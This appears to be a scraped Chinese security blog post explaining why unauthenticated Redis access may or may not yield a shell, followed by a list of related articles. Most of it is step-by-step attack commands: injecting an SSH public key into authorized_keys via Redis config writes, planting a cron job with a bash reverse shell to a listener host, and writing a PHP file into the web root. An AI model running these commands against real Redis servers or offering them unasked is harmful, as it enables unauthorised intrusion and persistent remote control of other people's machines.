ssh不能进入save方法_快速理清为什么你的redis未授权不能getshell
01
未授权产生原因
1.redis绑定在0.0.0.0:6379默认端口,直接暴露在公网,无防火墙进行来源信任防护。
2.没有设置密码认证,可以免密远程登录redis服务
02
漏洞危害
1.信息泄露,攻击者可以恶意执行flushall清空数据
2.可以通过eval执行lua代码,或通过数据备份功能往磁盘写入后门文件
3.若以root身份运行,攻击者可以给root账户写入SSH公钥文件,直接通过SSH登录受害服务器。
03
漏洞利用—root用户启动利用方式
SSH密钥登录
ssh-keygen -t rsa(echo -e "\n"; cat id_rsa.pub; echo -e "\n") > auth_keycat auth_key | redis-cli -h hostname -x set crackitredis-cli -h hostnameconfig set dir /root/.ssh/ 这里设置目录时,可能存在(error) ERR Changing directory: No such file or directory这是因为root从来没有登录过,在被攻击机执行ssh localhost 即可(error) ERR Changing directory: Permission denied说明redis并不是以root启动的6. config set dbfilename "authorized_keys"7. save退出redis8. ssh -i id_rsa root@redis_server 即可登录成功
计划任务反弹shell
redis-cli -h redis_serverset test "\n* * * * * bash -i >& /dev/tcp/监听主机8888 0>&1\n" config set dir /var/spool/cronconfig set dbfilename "root"save监听主机 开启监听nc -l 8888
04
漏洞利用—普通用户启动利用方式
SSH密钥登录
ssh-keygen -t rsa(echo -e "\n"; cat id_rsa.pub; echo -e "\n") > auth_keycat auth_key | redis-cli -h hostname -x set crackitredis-cli -h hostnameconfig set dir /home/user/.ssh/ 这里设置目录时,可能存在(error) ERR Changing directory: No such file or directory这是因为user从来没有登录过,需要自己创建config set dbfilename "authorized_keys"save退出redisssh -i id_rsa user@redis_server这里直接免密登录可能仍会提示要求输入密码,查看被攻击机的ssh连接日志/var/log/secureAuthentication refused: bad ownership or modes for directory /home/sojrs即被连接用户的目录权限存在问题,需要手工设置原因:sshd为了安全,对属主的目录和文件权限有所要求。如果权限不对,则ssh的免密码登陆不生效。用户目录权限为 755 或者 700,就是不能是77x,创建者必须为user。.ssh目录权限一般为755或者700。rsa_id.pub 及authorized_keys权限一般为644rsa_id权限必须为600总的来说,如果是非root用户启动,比较鸡肋,需要普通用户事先配置好免密登录的各项目录及权限,否则很容易失败
计划任务反弹shell
redis-cli -h redis-serverset test "\n* * * * * bash -i >& /dev/tcp/监听主机/8888 0>&1\n" config set dir /var/spool/cron(error) ERR Changing directory: Permission denied查看/var/spool/cron 目录权限为700,且为root创建即使该普通用户具有sudo权限也不行config set dbfilename "root"save无法利用
web服务器写马
config set dir /var/www/html/config set dbfilename shell.phpset cmd "<?php phpinfo(); ?>"saveweb服务写马需要知道web的安装路径
白泽Sec
技术就应该被共享。
学习,我们一直走在路上。
白阁投稿邮箱:ByLibrary@163.com
白阁漏洞库:www.bylibrary.cn
ssh不能进入save方法_快速理清为什么你的redis未授权不能getshell相关推荐
- windows php cli 后台运行_【续】windows环境redis未授权利用方式梳理
01 Redis未授权产生原因 1.redis绑定在0.0.0.0:6379默认端口,直接暴露在公网,无防火墙进行来源信任防护. 2.没有设置密码认证,可以免密远程登录redis服务 02 漏洞危害 ...
- debian 访问 windows 共享_【续】windows环境redis未授权利用方式梳理
01 Redis未授权产生原因 1.redis绑定在0.0.0.0:6379默认端口,直接暴露在公网,无防火墙进行来源信任防护. 2.没有设置密码认证,可以免密远程登录redis服务 02 漏洞危害 ...
- ssh不能进入save方法_如何 SSH 登录到 Linux 上的特定目录
你是否遇到过需要 SSH 登录到远程服务器并立即 cd 到一个目录来继续交互式作业?你找对地方了!这个简短的教程描述了如何直接 SSH 登录到远程 Linux 系统的特定目录.而且不仅是 SSH 登录 ...
- 哪种修复redis未授权访问漏洞的方法是相对不安全的_关于Linux挖矿、DDOS等应急事件处置方法...
前言 从去年六月份到现在做的应急响应.事件分析大大小小的做了数百个,主要遇到的有挖矿.DDoS.短信接口盗刷.用户接口泄漏.越权信息获取.挂黑页.删数据等.本文只针对自己做的应急响应中的挖矿和DDoS ...
- 记录一次Redis未授权getshell几种常见方法
记录一次Redis未授权getshell几种常见方法 一.redis未授权访问简介 Redis默认情况下,端口是6379,默认配置无密码 ./redis-server 使用默认配置 ./redis-s ...
- Redis未授权访问漏洞(四)SSH key免密登录
前言 系列文章 Redis未授权访问漏洞(一)先导篇 Redis未授权访问漏洞(二)Webshell提权篇 Redis未授权访问漏洞(三)Redis写入反弹连接定时任务 SSH key免密登录 实战实 ...
- redis未授权访问漏洞环境搭建复现-ssh免密登录
首先,安装redis 我是直接sudo apt-get redis 安装的 然后启动redis 直接找到/usr/bin目录下的redis-server和redis-cli 测试连接成功 因为我是腾讯 ...
- 网站排名优化方法_快速排名窍门
网站排名的优化有很多方法,恰恰是因为影响网站排名的因素有很多,最主要的就是域名.链接.页面质量和用户行为,下面就针对优化的方法总结了五点建议,希望对大家有真是帮助,前四点为优化需要注意的方向,最后第五 ...
- python 求组合数最快方法_快速计算投资组合波动率的方法
我正在编写一个numba函数来计算投资组合的波动性: 我使用的一些函数如下:import numba as nb import numpy as np def portfolio_s2( cv, we ...
最新文章
- NETGEAR拒绝连接请求_3分钟理解HTTP的请求与响应
- build.gradle
- Java数据结构和算法:图
- DL之Keras:基于Keras框架建立模型实现【预测】功能的简介、设计思路、案例分析、代码实现之详细攻略(经典,建议收藏)
- SparkProgrammingRDDs
- [转载]dbms_lob用法小结
- wordList01
- java基础—IO流概述
- CCNA学习指南十三章
- 关于window.showModalDialog()返回值的学习
- OSG仿真案例(9)——JY61陀螺仪控制飞机姿态
- conda添加清华镜像源
- 《哈佛大学公开课:幸福课》学习笔记(3)
- 变速器 美国sram速联和日本shimano洗马路对比
- window无法访问此文件夹,请确保输入的文件名是正确的,并且您有权访问此文件夹
- 辅警小丁同志 灵宝西站派出所第一警务区赵桥
- x1c 语言设置,创新经典平衡点 ThinkPad X1Carbon评测
- 使用Fluxion搭建钓鱼热点破解WiFi密码
- linux主分区和逻辑分区
- Google将IP标记为中国,影响表现以及解决方案
热门文章
- 怎么赚美金_我16岁时如何赚到200,000美元
- babel 编译vue_如何对代码进行未来验证:使用Babel polyfills编译JavaScript VS
- 数据可视化怎么完成的_完成期望后会发生什么:可视化育儿数据
- java写入excel文件poi
- qt2-无边框窗口创建、拖拽、阴影
- 【Python】直接赋值,深拷贝和浅拷贝
- 您能解决这3个(看似)简单的Python问题吗?
- 牛逼了!Python 开发植物大战僵尸游戏
- Hive分析函数--row_number 的用法
- Python time和datetime时间戳和时间字符串相互转换